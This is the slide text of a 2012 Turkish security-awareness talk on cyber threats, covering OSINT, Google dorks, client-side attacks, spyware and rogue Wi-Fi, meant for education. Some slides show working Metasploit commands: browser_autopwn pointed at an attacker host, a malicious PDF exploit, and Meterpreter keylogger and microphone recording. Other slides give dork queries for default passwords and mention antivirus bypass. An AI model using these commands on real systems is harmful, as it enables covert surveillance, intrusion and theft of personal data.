Yeni Dünya Düzeninde Siber Saldırılar

ve
Güncel Siber Tehditler
Ozan UÇAR
ozan.ucar@bga.com.tr

Boğaziçi Compec, EXIT 2012

İstanbul
 Konuşmacı Hakkında
• Bilgi Güvenliği Uzmanı ve Eğitmen
– Bilgi Güvenliği AKADEMİSİ (www.bga.com.tr)
• Penetration Tester
• Blog Yazarı
– www.cehturkiye.com
– blog.bga.com.tr
• İletişim
– Skype: ozan.ucar
– Eposta: ozan.ucar@bga.com.tr
www.bga.com.tr 2
 Genel Konu Başlıkları
• Yeni Dünya Düzeninde Siber Güvenliğin Rolü
• Siber Tehditler
• Siber İstihbarat Toplama Yöntemleri
• İstemci Tabanlı Saldırı Türleri
• Başarılı Bir Saldırı Sonrası Olası Tehditler
• Casus Yazılım Tehlikeleri
• Kablosuz Ağlara Yönelik Saldırılar

www.bga.com.tr 3
 Bilgilendirme
• Bu sunumdaki tüm ekran görüntüleri internet
üzerindeki açık kaynaklardan elde edilmiştir.

www.bga.com.tr 4
 Hacking Kültürü Hakkında

Bilgisayar yer altı dünyası bir aynalı salondur.

Gerçekler bükülür, doğrular küçülür.

www.bga.com.tr 5
 Genel Terim ve Kavramlar
Siber savaş(cyber warfare), siber tehditler, siber
suç(cyber crime), cyber espionage, cyber
intelligence, siber sabotaj(cyber sabotage), siber
terörizm (Cyberterrorism), siber casusluk (Cyber
spying), siber silah (cyber o weapon), sızma
testleri (penetration test), siber
güvenlik yarışmaları(CTF -Capture The Flag)
Yeni Dünya Düzeninde Siber Güvenlik
 Firmalara Etkileri
• Sanayi casusluğu
• Prestij kaybı
• Maddi kayıplar
• İnternek kaynaklarını servis dışı bırakma (DDOS)
• Sahte belge
RSA
RSA Detay
15 Yaşında, Gerçek Bir Tehdit…
ISP’nin DDoS’a Cevabı
Botnet Satın Alma
 Operation Digiturk

http://anonnews.org/press/item/1351/
Siber Şantaj
SONY
 Açık Kaynak İstihbarat Toplama
Yöntemleri
• OSINT, Internet kaynakları kullanarak hedef
sistem/kişiler hakkında bilgi toplama ve bu
bilgileri hedef sistem/kişi hakkında değer
ifadece edecek formata dönüştürme.

• Temelde iki bölümden oluşur:

– Görünen açık kaynaklardan bilgi toplama
– Genele açık olmayan forumlar/IRC odaları
kullanarak bilgi toplama
 Bilgi Toplama
• Hackerların sistemlere saldırmadan önce
internet üzerinden nasıl bilgi edindikleri, bu
bilgilerin nerelerde kullanıldığının
anlaşılması.
• Sistemli çalışan bir hacker herşeyden önce
istihbarat toplama işlemi/keşif)yapar.
 Bilgi Toplama Yöntemleri
• Amaç hedef sistem hakkında olabildiğince çok
bilgi toplamaktır.
• Bilgi toplama;
– Hedef sistemle doğrudan iletişime geçerek
– Hedef sistemden bağımsız olmak üzere iki türdür.
• Bilgi toplama yöntemleri
– Pasif bilgi toplama
– Aktif bilgi toplama
 Arama Motorlarından Bilgi Toplama
• Arama motoru != Google
• Google haricinde özellştirilmiş arama
motorları da vardır
• ShodanHQ – Pentesterlar için
• Pipl.com kişiler hakkında toplu bilgi edinme
amaçlı
 Pipl.com Aracılığı ile Şahıs Arama
• Pipl.com kiş arama için en ideal sonuçları
bulan bir arama motorudur
 Shodan
• Değişik bir arama motoru:Shodanhq.com
• Tamamen güvenlik testleri yapanlara yönelik
geliştirilmiş bir sistem mantığıyla çalışır
– Internete açık sistemlerde default bırakılmış
parolaları bulma
• SHODAN, filtreler kullanarak çeşitli bilgisayar
tabanlı sistemleri (desktop, switch, router,
servers vb.) bulmayı sağlayan bir arama
motorudur
Shodan Örnek
“default password”
net:1.1.1.1/24
“cisco-ios” “last-modified” country:TR
 Google Aracılığıyla Bilgi Toplama
• Google üzerinden “gelişmiş” arama yapmak için çeşitli
teknikler bulunmaktadır.
• Bu tekniklere GoogleHacking adı verilir.
– Bu teknikler çeşitli özel kelimelerden oluşur ve genelde akılda
kalmaz
• Efektif arama yapabilmek için bu kelimeleri ezberlemek
yerine
– Bu özel kelimeleri barındıran çeşitli programlar kullanılabilir
• Bu programlardan en kullanışlı olanı GoolagScanner’dir.
• Alternatif olarak Google Hacking terimini bize kazandıran
GHD(google hacking database) kullanılabilir
 Google Arama İpuçları
• Site:www.google.com
– Sadece google.com için arama yapar
• Allintitle:Security admin
– Title’inda security ve admin geçenleri arar
• İnurl:test deneme
– url’de test geri kalan kısımlarda deneme içeren
sonuçlar
• Allinurl:google test
– Url de google ve test içeren sonuçlar
Google Hacking Database (GHDB)

http://www.exploit-db.com/google-dorks/
Google’dan Hesap Bilgileri
 Örnek:.bash_history

http://www.southerndivasecrets.com/.bash_history
Uygulama
Türkiye’den Örnekler
 Siber Savaşın Devletlere Etkileri
• Ülkeleri sarsan siber savaşlar
• Çağın en tehlikeli siber silahları: Stuxnet, Duqu
• Ddos saldırıları
• Hactivist aktiviter
• Veri sızdırma girişimleri
• Ajan yazılımlar
• ….
 LULZSEC
• Ekip kimlerden oluşuyor ?
• Operasyonları ticari mi politik mi ?
• Özgürlük savaşçıları mı ?
• Ellerinde, kimlere ait ne kadar
veri var ?

http://twitter.com/#!/LulzSec
ANONYMOUS
STUXNET & DUQU
BTK Veritabanı Sızdırıldı
Siber Suçlardan İlk İstifa
Türkiye’nin Kimlik Haritası..
 Son Kullanıcıya Yönelik Saldırılar
• Kişisel veriler
• Banka bilgileri
• Eposta hesapları
• MSN/Skype yazışmaları
• Gizli webcam görüntüleri
• Ortam dinleme
• Facebook, Twitter hesapları
• ….
www.bga.com.tr 40
1.200.000 Kişinin Hassas Bilgileri
Internet’te
 İstemci Tabanlı Saldırı Türleri
• Browser (İnternet Tarayıcılar)
• Eposta Yazılımları
• PDF Okuyucular
• Office Yazılımları
• XSS Saldırıları
• Java Uygulamaları
• Media Player
• Casus Yazılımlar
• Sosyal Mühendislik
www.bga.com.tr 42
 Saldırı Sonrası Olası Tehditler
• Keylogger Kurulumu
– Klavye girişlerinin dinlenmesi
• Webcam Casusu
– Gizli video kaydı, fotoğraf çekimi
• Ortam Dinleme
– Ses kaydı
• Veri Sızdırma
– Kayıtlı parolalar, önemli ofis dosyaları vb.
• Bilgisayarı Köleleştirme
– Botnet ordusuna katılma, DDOS saldırılarında bulunma

www.bga.com.tr 43
İstemci Bilgisayarlar Nasıl Korunuyor ?
• Antivirüs Yazılımları
– Antivirus motorları
– İmza tabanlı & Sezgisel
– Bypass teknikleri
• Kişisel Firewall Yazılımları
– Atlatma senaryoları ...
• Bilinç
– Farkındalık ve eğitimin

www.bga.com.tr 44
Tanınmaz Meterpreter Ajanı

www.bga.com.tr 45
 Antivirus Test

Tarama Sonucu:
http://goo.gl/2M1wy
www.bga.com.tr 46
 Meterpreter | Keylogger

Keylogger olarak kullanımı;

> keyscan_start
> keyscan_dump
Hedefin ekran görüntüsünü ele geçirme
> screeshot

www.bga.com.tr 47
 Meterpreter | Webcam Casusu

Webcam görüntüsünü ele geçirmek

Webcam canlı video görüntüsünü almak

www.bga.com.tr 48
 Meterpreter | Ortam Dinleme

Kurban sistemde bir mikrofon varsa, ortam dinlemesi yapılabilir.

// 25. sn boyunca dinleme yap ve kaydet.

 record_mic -d 25
[*] Starting...
[*] Stopped
Audio saved to: /opt/metasploit3/msf3/nFqYscte.wav

www.bga.com.tr 49
Ajan Marmara
(Sanal Klavye Ajanı)

www.bga.com.tr 50
Web İnjection

Video

www.bga.com.tr 51
 Browser Tabanlı Açıklıklar
• Bir browser exploiti, kötü amaçlı geliştirilmiş
zararlı kod parçasıdır.
• Kullanıcının bilgisi olmadan, bilgisayarına
zararlı yazılım bulaştırmak veya izinsiz/yetkisiz
değişikliklerde bulunmak için kullanılır.
• Zararlı kod; HTML, Image, Java, Javascript,
ActiveX veya başka bir web teknolojisi olabilir.
• Zayıflıklar, browser teknolojisinden veya
eklentilerinden kaynaklanabilir.
www.bga.com.tr 52
 Browser Tabanlı Açıklıklar | Uygulama
• Browser Autopwn ile otomotik browser exploit
msf > use auxiliary/server/browser_autopwn
msf auxiliary(browser_autopwn) > set LHOST saldirgan.com
LHOST => 85.95.238.172
msf auxiliary(browser_autopwn) > set SRVPORT 80
SRVPORT => 80
msf auxiliary(browser_autopwn) > set URIPATH /giris
URIPATH => /giris
msf auxiliary(browser_autopwn) > exploit
[*] --- Done, found 23 exploit modules
[*] Using URL: http://0.0.0.0:80/giris
[*] Local IP: http://saldirgan.com :80/giris

www.bga.com.tr 53
 PDF Okuyucular| Uygulama
PDF formatının popüler olması ile birlikte, PDF
okuyucuların açıklıklarları etkili bir hacking
malzemesi haline gelmiştir.
• Adobe Reader
msf > use exploit/windows/fileformat/adobe_geticon
msf exploit(adobe_geticon) > set FILENAME belge.pdf
FILENAME => belge.pdf
msf exploit(adobe_geticon) > exploit
[*] Creating 'belge.pdf' file...
[+] belge.pdf stored at /var/www/belge.pdf

www.bga.com.tr 54
 Sosyal Mühendislik Saldırıları
Teknik sorunlar teknik yollarla çözülür, insan
tabanlı sorunlar insanla çözülür …
• Oltalama saldırıları
– facebook.com > facabook.com
• Bir web sitesinin bire bir benzerini (clone)
oluşturmak
• Java Uygulamaları
• Sahte Kablosuz Ağlar
www.bga.com.tr 55
En Zayıf Halka: İnsan

www.bga.com.tr 56
 SM | Oltalama Saldırıları

2
3

www.bga.com.tr 57
Sahte Eposta Gönderme

www.bga.com.tr 58
Sahte Eposta Gönderme

www.bga.com.tr 59
 SM | Web Clone & Java Applet
Social-Engineer Toolkit
Java uygulaması
olarak casus
yazılım bulaştırma

www.bga.com.tr 60
 Sahte Kablosuz Erişim Noktaları
• Yalnızca amacı kötü olduğu için “sahte” olarak isimlendirilir, gerçeğinden
ayırt edilemez 
• Kablosuz ağ istemcileri, saldırgan tarafından yayın yapan kablosuz ağa
dahil oldukdan sonra, tüm internet trafiği kaydedilir.
• DNS önbelleğini zehirleyerek sahte erişim sayfaları ile kimlik avı yapabilir.

www.bga.com.tr 61
Sahte Kablosuz Erişim Noktaları

Saldırı yapılan sistemden ekran görüntüsü

www.bga.com.tr 62
 Sahte Kablosuz Erişim Noktaları
İnternete ilk girildiği anda, sahte bir güncelleme mesajı ile casus yazılım kurban
bilgisayara yüklenir.

www.bga.com.tr 63
Teşekkürler